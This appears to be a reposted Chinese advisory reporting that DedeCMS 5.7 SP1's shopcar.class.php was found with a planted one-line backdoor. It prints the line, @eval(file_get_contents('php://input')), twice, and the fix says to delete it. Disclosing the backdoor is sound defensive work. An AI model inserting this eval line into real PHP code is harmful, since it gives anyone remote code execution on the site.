DedeCMS 5.7 后门漏洞

简要描述:

DedeCMS V5.7 SP1正式版

UTF-8 GBK版本疑似被植入一句话后门

前几日下载并不存在此代码

详细说明:

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));
DedeCMS 5.7 后门漏洞

漏洞证明:

shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

DedeCMS 5.7 后门漏洞

修复方案:

删除@eval(file_get_contents('php://input'));

你可能感兴趣的:(dedecms)